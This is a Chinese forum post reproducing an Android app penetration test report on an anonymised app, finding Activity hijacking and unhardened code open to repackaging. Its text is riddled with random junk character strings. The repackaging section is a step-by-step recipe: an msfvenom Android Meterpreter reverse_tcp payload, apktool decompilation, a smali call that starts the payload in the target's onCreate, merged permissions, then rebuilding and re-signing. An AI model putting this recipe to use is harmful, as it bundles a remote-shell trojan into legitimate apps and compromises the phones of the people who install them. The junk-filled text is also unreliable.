原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

admin · 发表于 2022-6-8 20:32:44

( [7 V, P) v' K/ L9 F0 V5 w- {$ H' o9 A# }) Q+ H3 }
1 A1 g7 `. |7 I% L% {$ f ! R( i4 ~ E+ t' }$ @, g9 K& Z; J! Z, o

4 b7 [' S" B1 r9 H7 l0 ^, ] {" w4 q4 s$ [ 文档编号： a( E9 h+ I' d/ ]6 _5 m1 g$ [ B) y0 S4 g " g( L. A+ l) p

j& W" g: v+ r : y9 N$ t* a( k0 ? " n e4 R1 d" o 3 o% P1 f5 Z) {5 W9 g2 x% U; ?

2 Q1 N H3 d% s7 ]. {* j" }0 l1 c. @' G% k% A' s 1 {3 K: H& ~1 I8 ~. ~ ! R8 \$ }4 M0 o' w

4 n0 c7 x( a0 Q. Z( [) H6 N8 t b0 o4 d! q6 Y: M( W7 q , X/ t1 Q5 L; o* T P & b8 @# c2 f/ r1 ]3 a

7 d# H+ a$ |* d1 W# Q" I $ P# ^$ N0 W8 G6 t ' k' V# b. Z$ p5 I+ Z2 y2 N $ K$ R S: _( Z3 ~* Z/ T

. O: g% q% T) v' \5 F ; z* h* s* D, S8 G( N; w( B 2 q: Q( N1 Q0 }' j8 r : M: m) r( X& ^3 r

* Y: d8 l7 U) c" }1 p" o2 |, p & K& J# }: A/ A w& T& R 某某某APP渗透测试 0 Z* l, m$ C$ q: h o }" Y$ e0 {& U6 @* ~% f( Z

0 S3 W8 t0 A. V; E : K: J: z& P$ L/ {2 m9 z 8 q- F3 G' s3 L/ S7 ` $ b4 L8 A& b' w/ Y" l. ]1 M

' @2 k! A4 h+ D0 I9 C 5 K6 O# h* y2 V1 K4 b; ]6 { , J+ u1 e' e7 g" t; Q' `; J . s" F" P4 I8 N% N( E. ~

! S1 H& \5 C- @ 1 o; Q6 R% I; J7 R. Y6 c - d' q' c$ X* |1 k8 p + X( b F! C9 x& V

% q+ {, R% N8 x, J. V . w, Q( @+ s- y9 y& u $ F* g$ z- g0 X+ g' {+ ^ Y 1 V2 G7 K1 F; {" x

' [% b. H/ z% X, {- u5 ?% h9 X2 |" b# b2 f( ^ 技术报告 / v H ]$ I7 K3 ?4 i5 z/ b, [ _$ [# P. {0 [/ t) @0 [

6 i0 ^. p2 L4 H5 o% s2 I* q6 d: V9 J5 [0 J/ k# u9 g) U , p2 Z& W( t; X9 R/ b& A- P7 o$ F0 v0 q, c- I

( [: i6 ?/ ?% Q7 N5 @3 x 0 f3 e0 j* U. n& }1 g7 G" ~ 2 z2 A2 Y1 n. f; ^4 A0 Z, R+ u: b0 r, d% @9 P1 V' ~7 {6 G& E' J

2 |& d4 M3 k: |4 B - k5 y0 N# p7 l. f " }9 @$ o( s2 U, }* N0 K ' o4 `- L0 v2 v6 G- G- b

O& Q' H. Z* W! J: g ! y2 o) z- I6 u; M , c8 @ _5 u' Q% {4 Q " I( p' D( ` p

6 o6 J9 o! f4 h. y! A4 Z: @# c$ I" ?8 s$ G( X ; g7 w5 z- s# P4 d5 r ! H# I1 W3 ~4 }$ K2 Q6 `

+ f; d5 d/ X: Y 8 z3 y9 T! F' {9 K0 k3 \% C 4 ]5 D2 Q. p$ B8 L7 S 0 U' U' j) G0 n5 N6 {; e

: a" N3 ]9 c: \2 A; g/ p 0 ^7 p1 X8 Q, q% P" g9 D ! U. i5 L. N- V& [: ?$ l! T6 x. |4 N' s* s8 _

e4 x. d! Z5 _" v + n# S3 V$ i0 S3 M7 } 9 l) a3 T) W- e, w1 O% t3 Y5 Q6 P5 A

e1 U+ L4 y5 p' Z5 j7 @8 L & i; M5 ^6 W& b9 ] - B7 r" A8 i7 ^- }' l& r: i ( }' C2 d, @9 a: ^+ Q% y

' @5 ~$ ~* f' _/ d 1 J7 ~) Y! n6 R* l + F$ b. a8 l2 |3 D6 D, q 3 h8 N4 X6 H* l6 F

3 b! C) C' A) d: l+ @, r; @ l3 q9 _# H9 H/ D7 p- O. m1 F0 l ! k8 z& J3 C' x# X' H ) T+ i% x" e# l( |3 G

! ]2 U/ f: C0 z $ x) G( ~- [2 H / T- w1 a b, H ' x5 b# V# S o2 w6 m; P" d

3 v: n0 y% Q0 D' G5 H/ A0 N9 } E9 o- t4 ?" v8 J, z 1 R0 S2 e$ j& Z( F, ]2 l+ M ) M y! P: e, p* ]: {

' G; r8 C+ u* r! o! Y8 i% n 6 z, @& n2 x' n1 ] % k% p/ Q! P' X, z- A2 D& J1 q( v

/ h, P: Y% A x* I; n) s . L o u5 G' r5 f ^* A 3 c2 ]0 S1 }6 g) l8 O+ d5 L6 H5 U - l# ]1 V7 z( K5 G

& x- a& [1 z' g+ Y$ Y w & ^/ Z) }1 v$ S# \% ^6 i! |' w 3 F% U6 _" E, u3 S# _9 d! Q1 R $ r5 B9 { S8 m! l( a( K9 `

" x( }8 A' P) y' z a9 i w0 j9 m ~' J: r2 K. E # y( |# F/ k* s: f ! }% B" t _5 p+ b) q$ O

b0 u) z6 K4 n) p: F- R; M 5 z/ a& e) ?! l+ N % `/ k7 [& D, b: q( I2 J4 Q: L, M, Z. X* b/ I6 P3 r

9 p: u6 A, [, S7 c( Z) b5 U - j! n( x' ?+ y3 e9 J 二〇二〇年 " o. u: d. Y, D5 O1 T; F % {3 H2 U4 K1 y8 }1 f9 _

$ M3 R& n# L' S& T, L" W0 h4 T! d# j- g+ m8 P v [% L 目录 , e g$ \: R/ W$ q, o) x! V7 I; T1 L1 W5 e. x

( W, A9 Y# T% m2 Y6 q3 P # {! z$ `+ L0 g6 d! L 9 ]: W# ~/ L1 X2 _; L9 x4 O" W' ?8 E

- ]8 K8 M, _( C$ k, \ 7 Z8 K: @/ S5 ^4 Y( n2 p 1 概述... 3 5 S0 J2 T z- Q + \6 h* j6 n+ X) S+ ]6 M. R0 q

3 u# _; o4 \' S1 y3 D) r; B " B' Z9 A. A' Z' D 1.2测试时间... 3 % b& G8 O" X# @$ c, [ 8 j5 d- h$ S: y5 I, |

1 b+ X1 W% g0 K ( H9 H' |, g% a) e 1.3测试对象... 3 7 H2 P- C6 @2 J" j! Q* l : E" K: o! g) z' u

5 @$ {# O; z% g 9 n% m$ A0 z; U; J: O 1.4测试结果... 3 4 N" r) l; R# Q5 W- U3 C$ _$ u/ d. [& E2 E; H% f$ R# W! W

- U( a1 [8 }5 i4 [ 2 ^% M! Q6 D/ M2 C2 s& t% E& s; W* l 2 检测结果... 4 ( d2 @( J4 z) O+ |! l- d- ]- C 7 s% e4 Q F4 `3 o4 t W) |

) T2 K! y% c8 P& I , q: c2 K( { ~0 x# U- T 2.1 某某某... 4 6 e/ G' O9 L# \7 U, d 1 t8 r: O1 l; ?: v' c0 @

: z- I3 U4 s1 g% K1 J' B3 G ; f9 V7 Z0 q* ?. w! q 2.1.1检测目标... 4 / Z! v$ _" ]4 t) {) x$ X" t: E' K1 r1 a g' b

: A3 C9 u! F! [0 Y4 P % F# P4 F9 I0 u& Q* c 2.1.2检测结果... 4 ( i4 T* d8 l, P- N6 F' o' h 7 q# H% v* G, W* {2 g

8 T8 }4 r) R& o% Q0 R( g ! U2 g7 L0 w6 }: x- G) C r 2.1.2.1. 4 " i, A. w7 p+ H# t, u; A' h1 W; n 5 r4 L6 g3 v$ G1 |. N

& [# r$ ^" o7 R* h. y5 U) [, R7 T ) D' X) d5 b/ d5 p! E1 p; ]5 ` 2.1.2.2. 6 + s1 M; v3 v2 r+ s9 {# b$ l+ l: g& E, T0 ~* a t

! r0 }1 q* c" N- x - O0 r3 Q0 n2 y6 x% H2 V " @/ C1 d/ m2 h 2 e# b/ }7 \- P3 _0 L2 F: c

+ T% K; w$ p2 |$ V# u9 ?! c2 a% g) k; x6 C/ L 1 概述 - c$ E) ~7 p$ A( }4 M1 R 3 F4 N, \7 Y1 G. j3 K* \- t/ w p

) y+ V: i% ^/ ]% c( L 5 I- H- B- K; w1 M; e 1.2测试时间 ! d/ B! ]$ P8 r; J6 w _1 R- V- B) m1 h7 U

$ B4 V- ?3 F6 ~ * X5 [' p" U: E: r& o+ ~. V N2 }( ] - V5 ?3 `/ X1 o8 O2 p 8 o; q3 f$ U6 K2 d3 A 渗透测试时间 * h1 q3 G: G4 g # T! @9 z1 j$ b9 ~& k) \' r9 J ' D& V: l. d7 n / X6 F9 O# X) N4 R: ^. ^6 ^" }- _
J0 @! B$ l; h& M% w+ _' k/ R' g \2 ~1 M1 e2 ?: Y, f3 {, W - m- U3 t! B0 y2 R # A& p2 ? } X7 K1 R 起始时间 ' T! x# b2 N* l6 k( [! S( i & W1 l L+ _# G, k3 ^+ c) i v 0 o9 }. G/ V ^- ~2 \|1 o2 _% e; Q$ \|	1 i! G( `6 L# p2 H9 n 2 m( g8 w4 _3 i$ @# W- ?9 B 0 j7 s$ [" b0 Q4 K( O " ]5 j0 [" B" M' p 2020年4月6日 ( r1 `" v" C4 c1 K& X$ y9 Y$ @ 3 Q( q' C3 ?9 E1 z. {3 Z 9 e* ?; x7 k% [1 I% s7 c) h - u5 f9 g2 j; y/ r
8 i4 V, c. }! ]6 \; V: m- Z" z! O1 W, u. x # Z' l$ B8 ]3 L* o' D6 R [5 m2 A+ _( a7 r* [ 结束时间 2 ]* J/ U X9 ]* ?& X) ~; _, e/ d: K$ Z) ^6 d( C2 b8 j + S0 A# f* G P( G; U. \| 0 z) S6 O9 }( e4 m4 `	# @! t/ u; ^' Y: s; u1 K# s* I: x* p/ ?$ }( n , Q* Q+ G" \|) N# f 5 u$ g# N6 y! g1 O 2020年4月9日 - @6 W' j# L/ Z7 J9 a6 K , z& I! @3 G1 b/ e( h 2 d% v+ Q6 b' b2 y8 i - S1 c- \( G! P, ?4 Q" U# ` h. y

% [3 L" }9 ]1 q S( N/ z. I1 r 1 T O( S* G3 l; k, r" ~7 ]/ O 1.3测试对象 0 Y$ [# H2 e7 [' Q; x & W4 y9 c# y1 ~6 H) }$ m+ T$ d& I

* z/ m$ f! }- K; Z" ^ + ?& w1 U; h3 S8 c: s 此次测试目标为某某某安卓APP进行渗透性测试，APP存在安全漏洞数量如下表所示： : T; h3 I$ v2 S/ U1 ~% j, u @' ^- B 0 ^5 g- t* @% ^9 R6 ?/ t0 Q& b; X

S& k9 T' x C1 y5 o & H, X* ^/ U0 n2 F1 u. q0 a$ O) \ 表1-1 检测对象 6 a4 P. n6 C9 ?* `1 W8 v7 q( N9 C " E5 N+ l) d) \) q+ Q

0 p# K% H2 V L0 g& c1 O- `$ T6 f4 a' p. b' Q2 f1 w, b , o) n7 ^7 h ?5 A) D3 N/ s: u2 a- Z# L! }9 b 序号 / Q: Y1 j# R) t2 q : F; \|4 ^8 @/ l $ w1 n1 c: x* A( Z 0 z8 M: `( V7 s	+ m0 b1 J7 F6 A6 s1 p- T6 [0 g 3 B. E0 }4 Q. T. K5 I# u * d. l5 H* A. H/ M 6 F# v# W% a9 l1 \|7 g 测试对象 6 B P: b7 t1 {& T4 f5 f 2 W, d; Y0 }) t0 H 4 E; k8 k1 ^5 J3 j2 P, ?; P3 L 3 _. v& k. J3 Y) V& O9 x/ X4 M	2 l! U0 A7 u0 W/ b- P! \- u * r; g! _: U d% a9 Y& U . R1 f- E8 i* ` 7 a9 ]3 b; L# t+ m7 {, Y 测试地址 & o: }5 h6 v1 R! w: j7 D, P4 f 2 P+ T# \& [6 V {+ a2 L: @4 I / `. \|. x8 ~, v" b1 m5 [; ~ 0 D% O; h; A8 T6 K	. C# J2 e/ G2 @- J1 \ 0 t4 h5 q5 o2 H9 b% U) C9 O/ k& E3 D 8 C9 i' S( \|0 H* v2 ` ' O5 P! k3 \9 ~$ x. E 安全漏洞 0 s) }7 F8 t5 E7 b0 U/ [, \! C8 F * X) @5 B! j2 ~$ u* K- D4 d # {* ]) r1 Z u6 }8 v, C9 e! y' Z O" B, M. h# q( r
, Y- u( y! ^% l% w- Q 4 I" D( u9 d, { j2 c" ]' l# i. ?4 D 9 B. ^; u. u9 j& f# f6 t ( n4 J/ ^9 I+ E& L- Y4 m9 o2 X5 n$ V! W 1 - }2 a' c' j7 ~% [ 8 B7 L$ c( F. J& D0 m" r # x) d) X8 T! Y# `. }8 q" ~/ k& i. c% G3 u9 ]% ~	/ n* j( F) H& z( h' a, r6 C8 w1 j/ W( z9 f& l1 V& `# J' l8 F+ f/ l2 k- O 7 N5 o0 Z: G$ W1 Z D 0 e& h8 B+ C: t8 }- c 某某某安卓APP 5 m$ Z6 h& ~4 W- N9 \| ?) y( D! U5 g' m# B $ S( @! e+ r& T3 M 7 i0 d5 n7 r1 {9 r# R	0 z) Q. ]1 Q! u8 D8 G+ ?/ c+ p, B* u% h% v/ @: w# {4 w! ^ + n0 a# Z: v7 b a M4 D* g' R+ G0 p# I4 m/ k4 } . j4 B$ h3 X# q" `8 ~% v1 B( x: u* [! G2 }) D% K7 L. M. ~+ G V 5 H9 \! E/ F7 A) B, U* Q2 \+ X( p5 l) A' Z) {! H) Z# ^	$ U% b8 D+ K2 d0 n* ?- _. N . U U4 [; X0 M$ f2 c " s) Z, A) @/ T. f 3 ]7 P6 g: Z( j 2 9 x8 L' S1 j5 ?* v $ ^, T5 [/ n4 W* [, F0 Y - ]- r+ j% F2 Y1 S9 T+ x! m! [1 \ ! ]' w' E3 e3 H9 F+ S6 W9 H* {* b

# ]$ S- U/ a1 t2 h; ]' L6 m; [( ?' g, I 1.4测试结果 ( ^) l5 ~5 H; y* ~/ G 4 }1 Z. L' u5 p0 n

# b* G. s( A E9 `; a3 p4 V( n& d& b+ O 在本次对某某某APP透测试中发现，APP安全防护存在一定问题，主要问题如下所示： % {% _1 k) o3 Z: s0 ^! y) n& ? 9 O2 W# g+ P# l' L# J

: D' t& F3 x6 e7 P+ W9 t! j5 R ?8 G) o; g8 p1 x% N; C0 ] " x# z- P: _1 {4 ~4 c4 h: S* n ' y3 ?. Q. B; d# G1 j( k

% b: U; L( K; C % I6 X5 H! o) m4 v% T+ O5 M 序号 1 T! h& X- j# e4 e$ K & ?+ U0 E) ]8 W3 K# L& M5 s- f) r

+ a* ]5 ^. Q1 o * l1 \5 R( ]7 v/ q 系统名称 4 z9 C" W6 [! S/ y ( C9 N& C7 q7 T

+ A; Y9 D ?/ X5 ~0 L0 K ( J1 X1 I7 W+ ^! w: o 漏洞名称 4 t( r1 l$ ?4 j + P9 P7 R5 }% k

4 P0 ^& w2 h+ w$ K' d: C/ F 1 F+ B6 R( s1 U6 b 漏洞危害 ; j, S/ `2 o( V # d1 ], F2 R; z$ i9 L4 o( c w& N

9 [' f7 f* ?$ Q( f, _6 m/ ] 7 B+ H% F7 g3 g' _8 V6 I 修复结果 / s; B5 \8 K/ t6 T& V. G K3 J' d I) G6 n8 b3 F

" G \+ W4 i0 k( H! x- j 3 k" G% ^' A3 @: h$ f 1 # G H, c; `3 O [2 @1 t& T0 J8 b$ Y

9 O+ d6 i: c/ M 1 S# R/ O3 @& X 某某某某某某APP 0 D' b) [ [! G+ j) G3 v ! r# T2 C( e3 I' Q

# x4 Y: E: _- _# x7 l) r% n U G* @$ g/ x* w* l4 m Activity 劫持 6 _1 f( N) m! U4 u / B- Y( ]1 ?$ R

* n& G! l0 n3 r# I$ k, \- v . P; M3 ]9 I# d , s% ~# w# o# U- z 8 s/ `! s. m% B" q5 o7 M! X" l3 ~1 M

; [! w% O2 |6 f* q! @4 Q; e' ?6 ], D: P4 A) T" b& p 高 2 J, T/ J7 f( l6 a 5 |% [7 ~" Y( k M6 X6 ~/ _" C0 y

D6 s* v9 i6 E. X2 k * z0 g3 U& H% \% A. A ( `# x( ~; { N& |! ` + D! L1 `( r; h7 r( x* p

' i9 @) z" T& D 5 D$ Z- x+ }: r8 I) A5 W8 n 2 8 q( q2 P; |0 p0 _. K7 o9 t% z. X* h' [* x# J

) Z0 V2 N6 R* T# H. n: a" q; l }) G! c, t 某某某某某某APP & O2 i1 f1 ?, K+ m , V! Y9 ]/ l5 {8 |) }! a

. e" c! V: `1 w; J ) S2 F2 N" Y# W; x3 i8 |% [' y% m 反编译二次打包捆绑木马、篡改APP代码 ' W5 [; p5 \9 ]% x2 L: r4 A 4 e7 O% i# H8 J. g) K# }2 `! P

/ r/ B f: w# b" F0 N- \& l; D6 W. J% z" z1 K 高 6 T: |* q$ o+ W: W( T) K 5 s( @! P) W( ]# D

- f( E3 O" [* K6 E - R4 E2 N, n! l7 y7 D6 h( F ) J' \- [+ I* J, M& |0 ? 9 U/ ?1 s6 x9 B6 C' Y

6 Y1 F# r, j8 }3 M2 O1 d 5 n# ]9 n& z# U$ t c# v" l5 c X \/ z/ H/ c / A, K6 e. _* C& M

; i8 a5 ~1 M, w" M) w " }0 }! f3 o$ U3 q7 l 表1-2 测试结果 6 b) k6 z! P( c 8 t: ?2 `! Y9 [$ p7 }

! c. U6 h/ F2 {* R& R3 Z8 N) h; h2 ~ + z* |0 [1 k" s# N / F( J6 @ y$ l

3 c$ F! p2 X) [8 [* X6 Z ! h# s; h! J/ A' s 2 检测结果 0 A7 U: y" H0 x5 [3 u, b: ] + A9 Q2 U: B' z( o5 ^+ O

2 I1 E' w e, n/ O5 U( r4 L : ]& I$ ?2 R$ \$ s! W% N( p 2.1 某某某 ( F* X9 a' N: _% @5 p , v/ `4 c: ? D. d. [4 G: z

7 [0 I- ]3 H8 C5 |: R ' n- q7 u" s% {# s; f' ^ 2.1.1检测目标 , ^9 {3 h) L& p& \ & o6 V4 _5 J' R( |; q. g

; G& h6 }" V$ ?1 i( ]& D2 t 2 ^9 \2 B4 f# T2 O4 j 目标地址： 某某某某某某APP 3 {1 [! z m2 ^3 P' L+ j0 [; o: q1 m; F9 d b5 V7 O" q8 b/ W

5 a$ h$ o$ N7 R& b7 E# \3 V ( ?8 l' b3 C8 e4 Y; J F: i 2.1.2检测结果 q% y4 d; N% u0 O5 l) B5 ^9 J $ K6 `- I1 Y* U/ C

: ^, K) Q' e! F" b) C1 F/ T4 b3 q+ b1 b" I: b. ~* v 2.1.2.1 , F- |! C/ e" T3 ]! i 4 @( w' v; {& u6 O5 }6 M9 x% `. M

0 A5 k# j5 b$ e) z( y2 {! \# ` ( ]5 m* p7 `# M* c9 X0 h 漏洞链接地址：某某某某某某APP : `: e' v# X' |' U3 F* E' {( o 3 m! p3 F5 H# L5 ]

0 d1 b( w3 L- v* v% c % j0 w: v* [! A' T) _9 [- n : k( i- w& J9 j0 X$ u' H 2 a6 A I8 a9 K* r8 a$ b+ N

5 z8 l& r W l7 D9 U4 I0 }! r * M8 d/ n+ a/ E0 r7 T: D5 P 漏洞分析及取证： ! a) J- P: G( U) `; _, H. b 8 w s! T" D( M+ A

1 P; N, ]" k" [; n2 |: O( n) k 5 U/ m* \, ^" f/ L( |8 d! Y ^# A 通过androidkiiler反编译，发现app未进行安全加固， Activity 为com.minivision.cmcc.activity.SubActivity可被劫持，复现漏洞如图： ! p/ G" p: _6 A( _" O 5 ]( I+ P. t: j* ]* {9 N$ z" M

" i9 x, l5 K: @7 o . d0 q5 c: o' G! w5 f% S7 J' | . ^/ u9 u7 B' M( H+ B$ ]0 p H/ n" ~+ F' r! ~7 s' L& Q/ Z' E0 k

' c' o8 l. f1 z3 t/ {( [7 f9 G/ G( K; i ; r L& @6 Y6 I. v8 A) ]& L3 P8 P5 J2 b9 f

( M5 R) x& |$ n. ^6 C: s! ^- L# ]8 }' E3 D- k( s M 2 }* n$ ~2 \# ~4 p; _: u 5 S% o( N. _- `. ~2 ]0 ]0 N5 C

8 X6 e/ U. k, Q5 u # c( G2 Z* A' l/ ~$ F 9 V$ q. I) N0 x' m' Y 7 {8 V% p* n* n6 ]) h, ^

2 R: Z5 d0 z! k : \' G) }& V( z7 c, Q) V ! d& h7 j1 y. \ 0 H% [# D2 j. ~; t7 s1 i5 s

$ X& x/ |. m1 W( O" V 1 O" V4 d4 ~" r& l 漏洞危害：高 ) P' W. I( a# w& c- |% z4 o3 F 2 D, [# r/ s7 U8 ^: W5 B" ~! o

# X H9 N+ h: q9 V! y1 c( k / S/ u+ @# Y+ e$ Y5 }. y' v; o% o ; ], X5 I) q' G6 h% P4 ` N! a ) V! ` G, s6 a& g5 z 严重程度 / l: @- ]% F0 g* H3 J 6 d, K0 N5 S: F3 j! A , s. J$ t; I8 G$ w0 v, [" L& s ( }4 ^0 H3 h2 z: I* A' j, F	# Y# C3 u* c) `9 a ; }+ `2 K0 g7 J! ] & X/ b( W/ B7 J4 C" d, W, m + P6 g1 P6 x+ I' V/ u 高 8 W+ H3 B& U5 K% D 1 e2 N- y5 u$ Y, g+ ~: x1 q ; q; M* @' \|) Q% h7 l; I! p 7 ^4 V( ]( x5 a	8 M# {( L7 U: v, a8 J * w, ]$ a8 K {( m+ Z+ `+ G; c 0 `+ l) G8 `) \|/ L ' `8 A1 _. \|8 C9 G, a3 K! v- y ■ ; k1 R! U9 L, {8 u+ k, S v* E * d0 m& P; w+ { J( m4 y 7 G8 @; g( L6 \|& a0 H + E' T; y9 f3 P" C( b	. \, C* ^% s) i2 E % w! T) t- S) Z1 I: ]# l % G# _( S* p3 k$ Y8 R ! s# p1 ?9 T) e 中 : g6 x5 A! K6 J . U9 `% H% T, o2 d( G2 N ( T# l2 n0 o$ ?, ]" Q4 C- z" G% f! c. q0 w6 [$ u9 o	" T) r- D- m0 T8 a- ^( Z7 a' a5 B+ G . t! \|; r7 V2 \. G% s; y 3 e/ c1 D- _, x. } f& p4 Z4 d" }: m u7 B* q/ x' K. ]- t 6 x8 h; E+ k# G# s8 g P5 H& H* }. ?7 U$ c7 ^& h 1 _7 F+ ^3 r1 `- w% `& Y	5 O8 J Y Z) E" i$ Y8 N % ]0 a$ o5 \|" H2 p0 t % {5 t2 C7 m) A0 {; e! y1 i ; V' R+ H4 ~1 V& G0 g 低 5 K; }, _9 O3 L% A, S. G2 G " j$ ~( ^ i" L+ }: c- k- { 1 g3 s6 H! X! A' X + a8 y/ @( y9 @4 [5 B	4 N3 B; ?, [( D2 N4 H' @( V1 y/ ?7 c A" j; L, N+ \8 q + r5 P2 r, d# t5 r4 _* z0 d + b) k$ }) O# s1 z+ W : a/ [3 F" t; q* I+ S. i( c! x1 q/ \2 A/ U + K8 `3 H1 y r- l8 U0 E4 g# r6 I$ W$ P. N3 [

& S. n' \& Q/ @9 c1 Q% e/ F 0 I/ g4 G: M, Z A# k9 Y / A+ J4 Y/ z: C ) u. B4 ]: t$ k6 T! w# Q

, H. m% P# k" Q" A: ^( R9 u9 U7 y4 T, s- B0 d9 d/ v 修复方法：在 APP 的 Activity 界面（也就是 MainActivity）中重写 onKeyDown 方法和 onPause 方法，当其被覆盖时，就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的（触摸返回键或 HOME 键），如果是用户自己触发的则无需弹出警示，否则弹出警示信息。 8 Y* K3 B E$ ^) C $ r+ Q2 L& Y, P$ a( L

' K c8 d& H. T' l # ]$ Q3 I% m: Z f : C1 ], O0 X$ l; h9 l0 W, y0 w * [/ |- i: |/ l

9 F+ R0 e9 ?4 D! Y; H! ^* o & v) f a7 F1 Z5 G& }/ x- m $ ]+ u; j/ E+ h4 c0 v2 m+ g. c. G% t7 P+ `$ ~+ p

* v h/ _/ k3 ?/ S% b ) s1 c: z+ F! F1 M$ |# n6 L+ X1 { 2.1.2.2 3 p L& L; C: w q & B d6 U; Z, Q% \

8 s( M" X* [ | 8 k8 e" M. j/ Z( r6 s& Q 漏洞链接地址：某某某某某某APP / ~% E, H* s4 Q1 {* [. I3 S ' P# q! y! P( s' f

* M0 h2 z# y7 r% E5 I1 m9 Y e( w % s+ v" d) X- U1 p; ?2 H 漏洞分析及取证： ! N+ f6 p# O4 P" V! k! m ; U7 ]( O* l/ A' t' U

! U: G( j/ k7 u/ r7 a+ k5 e ]; x) S( W' U. }+ [ 通过反编译，发现程序未加壳加密，可直接反编译获取源码，经过测试可修改app代码捆绑木马或者植入广告等操作，复现详细方法如下： 0 I' _+ _% h2 Y1 b0 x! v 4 K9 v" r) p$ K7 i4 u3 I

( b% V$ N& f5 [- d7 P3 [ L- Z* d# r V9 q 用Metasploit 生成木马 apk # u+ z6 p) ]4 z6 k8 o; V $ b3 [1 W6 F Q9 Z5 W

8 `* |: L1 W; w5 F ' \2 e3 y4 V( i e msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk 3 a4 B- @, ^) b: ?( | ; |1 {2 W5 K- t) q% I& q2 i7 b

8 [) U7 |. T S 反编译目标apk和木马apk 6 L6 ?6 W- g9 n6 b* O5 T" | ! t' h; C! i& C3 X

8 k8 K6 M$ \. [6 U/ ` $ l; Z% o0 Z6 l, k8 { R: Z3 Y apktool d target.apk
* `% o$ L' _$ T8 P# d' K- ~- D + c9 t$ p# m: R p2 S1 Z apktool d cockhorse.apk 7 n1 F. x: @) o8 w9 \2 w- p, A' n; y& Y" P* C

. ]# h6 j; w' N$ {" d8 X - w# g1 E/ S9 L' x7 q6 [- s 木马 apk 注入目标 apk 5 \/ a4 }" r4 a) c2 O2 v; M & e! C' Q6 b, V- A

# k6 Z7 R* V( E" ]3 z / Q5 H) q/ B. d1 l! W 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件，并在 onCreate()方法中添加如下代码：
4 q6 v% s( U; X/ I/ s" _ % g) m3 h8 M1 L5 T/ J invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V , C& ~+ k; S- ]$ e% s$ W - o; F2 F$ W' |

" K Y" n' Y" m- V ' b* Q9 h" m! o8 ~ 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中，去除重复 + o% f$ r( m: w1 K: {/ V8 o , l: ?' s! ~8 U4 Q

# [$ ^- e3 |) X% r% G% {0 f/ s. B5 J# S! x 将木马文件的 smali 文件放到目标文件下，例如 com/metasploit 文件复制到目标文件 com/ 下 9 ~- Y4 p+ S; G # M, r5 e+ N6 `' k; j. e( A

% T$ `% X8 \8 C , i3 L) r$ z' O6 X" T* G 回编译生成最终 apk 7 D8 j4 m! w! N3 X- f( ~5 n/ f5 x0 L% }% d$ M# g% b& q

# r8 \& C A) D ( S( E' `; t( P% E 重新打包 . G7 ?! i% z/ ~3 r; J+ r* ]6 L" q& N4 o( l

' n7 t3 u% O& g/ o( U, k( j( a7 k& ]7 z4 J, W# ]+ O7 Z! d6 U apktool b -o repackage.apk target_app_floder 3 S" \) M" P- Q+ b' z ' h2 x6 O% D) M% {/ B

8 r# n% x; g% k2 g; @) D" X0 L% _9 R" F3 |- }) J; Y- F4 G 创建签名文件，有的话可忽略此步骤 : @3 b% u+ ^4 s7 T+ h4 a0 Q6 B' B/ _$ y' K/ P3 e2 S2 {3 j% U/ B

* Q0 R! A: s/ ^6 v8 o. L0 n% P , o( X# ?% q$ u4 ^4 X keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000 * O- u1 X4 ]% B8 G ( V7 H3 D2 Q5 n8 H. E

/ ^& Y# R# j3 O+ [ & j }' j3 x( ?0 G$ n 签名，以下任选其一 / q* ?2 H" }; f' A8 X) @: p, T# M* d+ V/ f$ B3 _( X/ b

8 L7 l- M" C8 t3 L: X7 W: i 4 F; s8 y: d7 F jarsigner 方式 * @, D( B3 |! d) _ 9 x" l- ]0 G, @. j

4 z/ p; d9 j# [0 y# Q8 K0 [ j 4 J! V$ d# x& v jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname 8 f' V$ a. E: O6 ]/ F ( }, e* `4 `4 E3 y

' I3 D1 V5 G0 W7 l N- r4 \. W2 Z4 G2 g! W- J* J4 p7 A apksigner 方式 ! c# E. D* }5 q % j- C; B5 V0 e* c3 a

9 i6 j7 Z2 i4 n6 Y5 R, @; f% z8 p5 i8 ]( G. O" p4 W" T+ p apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk * |4 H7 ~+ O6 L0 A- u- @' ^# A0 ?' \* \2 }: y9 v1 B

1 s) P! N3 e, ~( L ; l% A" o5 @5 k" M. S8 Q8 W; @ 如需要禁用 v2签名 添加选项--v2-signing-enabled false , n- P/ R; N% d* y) n( T0 Y2 \8 z+ r6 D- m0 |2 _4 e" K% x" V+ r

! H1 h7 ?* ]: D8 O) |7 }8 X $ r- L. [$ h0 j; s 验证，以下任选其一 # K1 [ m; {! e1 ^0 ` 7 o( g) @ C# p. h* D3 _& E

; B" \& H6 C' m8 F$ j8 r5 V5 a* o) H: L5 H- x: q jarsigner方式 & _$ Q+ s- b. l0 i$ v9 w2 g2 w* [) b: U/ n9 p3 {" {# z

V8 C8 D+ v) K. X- ^; C3 E O; b# I- R jarsigner -verify repackaged.apk + ^& X) R1 [1 b% Y 6 p& D" m1 p$ `3 S1 `& l2 N5 o: }, l

/ L: p) r9 F* I$ I, h# B4 v" h4 ^( d- j$ I apksigner 方式 g3 S: z- i# G/ B/ G# E1 u9 } 9 X/ E8 A; M3 H x! `' [

; J8 N: E. r0 i% E) ~/ ] ( E9 O8 s( X2 o apksigner verify -v --print-certs repackaged.apk 4 @/ y) `$ y$ p$ N& t ' h j1 o; R$ u( \1 m

# F% v" K. L& H7 t: P - R' @! b( x' g; k8 M5 a keytool方式 * z1 p. }8 Z, v- z) l9 i6 X 9 o4 c8 l# D' u- f

% z5 a7 x' x$ p; }. y2 @. I* [2 Y& }3 w. Q, _' U keytool -printcert -jarfile repackaged.apk m6 F6 A( X) M$ L8 ] ' b: e) @, O% \" J# ?' C! j

# o; s4 K8 C* w, N3 s7 Z- p/ g. `" J; l) J( F# L: O+ F 对齐 9 V+ R: H% R& A9 m) h # z3 A( j6 T2 Z e0 B7 r, I2 ^/ T

